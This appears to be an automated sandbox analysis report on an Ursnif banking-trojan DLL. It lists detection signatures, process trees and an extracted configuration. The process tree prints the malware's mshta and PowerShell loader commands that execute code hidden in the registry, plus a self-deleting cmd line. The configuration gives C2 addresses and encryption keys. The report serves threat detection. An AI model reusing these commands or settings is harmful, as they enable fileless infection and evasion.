Edit tour
Windows
Analysis Report
VoevdOQpeU.dll
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Windows Shell File Write to Suspicious Folder
Writes to foreign memory regions
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Sigma detected: Suspicious Remote Thread Created
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- loaddll32.exe (PID: 1428 cmdline:
loaddll32. exe "C:\Us ers\user\D esktop\Voe vdOQpeU.dl l" MD5: 7DEB5DB86C0AC789123DEC286286B938) - cmd.exe (PID: 1796 cmdline:
cmd.exe /C rundll32. exe "C:\Us ers\user\D esktop\Voe vdOQpeU.dl l",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D) - rundll32.exe (PID: 5292 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\Voev dOQpeU.dll ",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D) - control.exe (PID: 6956 cmdline:
C:\Windows \system32\ control.ex e -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F) - rundll32.exe (PID: 7132 cmdline:
"C:\Window s\system32 \rundll32. exe" Shell 32.dll,Con trol_RunDL L -h MD5: 73C519F050C20580F8A62C849D49215A) - WerFault.exe (PID: 3084 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 1 428 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B) - WerFault.exe (PID: 5640 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 1 428 -s 616 MD5: 9E2B8ACAD48ECCA55C0230D63623661B) - WerFault.exe (PID: 4144 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 1 428 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
- mshta.exe (PID: 6532 cmdline:
C:\Windows \System32\ mshta.exe" "about:<h ta:applica tion><scri pt>Xf38='w script.she ll';resize To(0,2);ev al(new Act iveXObject (Xf38).reg read('HKCU \\\Softwar e\\AppData Low\\Softw are\\Micro soft\\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E\\\TestL ocal'));if (!window.f lag)close( )</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB) - powershell.exe (PID: 6612 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" new-alias -name uqcy wglb -valu e gp; new- alias -nam e kiubrmsy n -value i ex; kiubrm syn ([Syst em.Text.En coding]::A SCII.GetSt ring((uqcy wglb "HKCU :Software\ AppDataLow \Software\ Microsoft\ 54E80703-A 337-A6B8-C DC8-873A51 7CAB0E").U rlsReturn) ) MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 6644 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - csc.exe (PID: 6788 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\poet0yx q\poet0yxq .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 6804 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES2392.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\poe t0yxq\CSCB 57F5835494 94C91A9647 985948976. TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - csc.exe (PID: 6844 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\bscdh0f 0\bscdh0f0 .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 6920 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES3B60.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\bsc dh0f0\CSCC EA1AC591E3 E41DFA7DCA 22F6F20A95 .TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - explorer.exe (PID: 3616 cmdline:
C:\Windows \Explorer. EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D) - cmd.exe (PID: 4432 cmdline:
C:\Windows \System32\ cmd.exe" / C ping loc alhost -n 5 && del " C:\Users\u ser\Deskto p\VoevdOQp eU.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 5764 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - PING.EXE (PID: 5388 cmdline:
ping local host -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
- cleanup
{"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Click to see the 15 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Click to see the 2 entries |
System Summary |
---|
Source: | Author: Florian Roth: |
Source: | Author: Nikita Nazarov, oscd.community: |
Source: | Author: Perez Diego (@darkquassar), oscd.community: |
Source: | Author: Michael Haag: |
Source: | Author: Florian Roth: |
Source: | Author: Florian Roth: |
Source: | Author: juju4, Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Source: | Author: frack113: |
Timestamp: | 04/23/22-08:12:19.910177 04/23/22-08:12:19.910177 |
SID: | 2033203 |
Source Port: | 49766 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/23/22-08:12:21.823792 04/23/22-08:12:21.823792 |
SID: | 2033203 |
Source Port: | 49766 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/23/22-08:11:59.593120 04/23/22-08:11:59.593120 |
SID: | 2033203 |
Source Port: | 49760 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/23/22-08:12:20.776897 04/23/22-08:12:20.776897 |
SID: | 2033203 |
Source Port: | 49766 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 2_2_049F3072 |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_0580FCC0 | |
Source: | Code function: | 2_2_0580CE21 | |
Source: | Code function: | 2_2_05805A14 |
Source: | Code function: | 2_2_0580591B |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | Network Connect: | Jump to behavior |
Source: | Process created: |
Source: | ASN Name: |
Source: | IP Address: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Code function: | 2_2_049F4CC6 |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Code function: | 2_2_049F3072 |
System Summary |
---|
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: |
Source: | Static PE information: |
Source: | Process created: |
Source: | Code function: | 2_2_049F821C | |
Source: | Code function: | 2_2_049F198A | |
Source: | Code function: | 2_2_049F475F | |
Source: | Code function: | 2_2_058184D9 | |
Source: | Code function: | 2_2_05808FA6 | |
Source: | Code function: | 2_2_058237F4 | |
Source: | Code function: | 2_2_05801E50 | |
Source: | Code function: | 2_2_0581C3A9 | |
Source: | Code function: | 2_2_05820B0E |
Source: | Code function: | 2_2_0581488B |
Source: | Code function: | 2_2_049F3A9C | |
Source: | Code function: | 2_2_049F4695 | |
Source: | Code function: | 2_2_049F25D7 | |
Source: | Code function: | 2_2_049F8441 | |
Source: | Code function: | 2_2_05815D9D | |
Source: | Code function: | 2_2_0581F5FF | |
Source: | Code function: | 2_2_05815CA1 | |
Source: | Code function: | 2_2_058144A5 | |
Source: | Code function: | 2_2_05801C78 | |
Source: | Code function: | 2_2_0581312E | |
Source: | Code function: | 2_2_058212F1 | |
Source: | Code function: | 2_2_0581AD9E | |
Source: | Code function: | 2_2_0581B628 | |
Source: | Code function: | 2_2_0581264B | |
Source: | Code function: | 2_2_05815188 | |
Source: | Code function: | 2_2_058029B2 | |
Source: | Code function: | 2_2_0581C1C2 | |
Source: | Code function: | 2_2_0580A085 | |
Source: | Code function: | 2_2_05815830 | |
Source: | Code function: | 2_2_05801B92 | |
Source: | Code function: | 2_2_05807A1E |
Source: | Binary or memory string: |
Source: | Key opened: | Jump to behavior |
Source: | ReversingLabs: |
Source: | Static PE information: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | |||
Source: | Process created: |
Source: | Key value queried: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Code function: | 2_2_049F6DB6 |
Source: | Process created: |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_049FB301 | |
Source: | Code function: | 2_2_049F821B | |
Source: | Code function: | 2_2_049F7E29 | |
Source: | Code function: | 2_2_05812C1B | |
Source: | Code function: | 2_2_058237F3 | |
Source: | Code function: | 2_2_058232B9 |
Source: | Code function: | 2_2_0580A513 |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Process created: | ||
Source: | Process created: |
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: | |||
Source: | Process information set: |
Malware Analysis System Evasion |
---|
Source: | Process created: | ||
Source: | Process created: |
Source: | Thread sleep time: | Jump to behavior |
Source: | Evasive API call chain: |
Source: | Last function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Check user administrative privileges: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 2_2_0580FCC0 | |
Source: | Code function: | 2_2_0580CE21 | |
Source: | Code function: | 2_2_05805A14 |
Source: | Thread delayed: | Jump to behavior |
Source: | Code function: | 2_2_0580591B |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: | 2_2_0580A513 |
Source: | Process token adjusted: | Jump to behavior |
Source: | Process queried: | Jump to behavior | ||
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 2_2_0580BE55 |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Thread created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 2_2_049F12D3 |
Source: | Key value queried: | Jump to behavior |
Source: | Code function: | 2_2_05804DF5 |
Source: | Code function: | 2_2_049F5410 |
Source: | Code function: | 2_2_049F515F |
Source: | Code function: | 2_2_049F12D3 |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
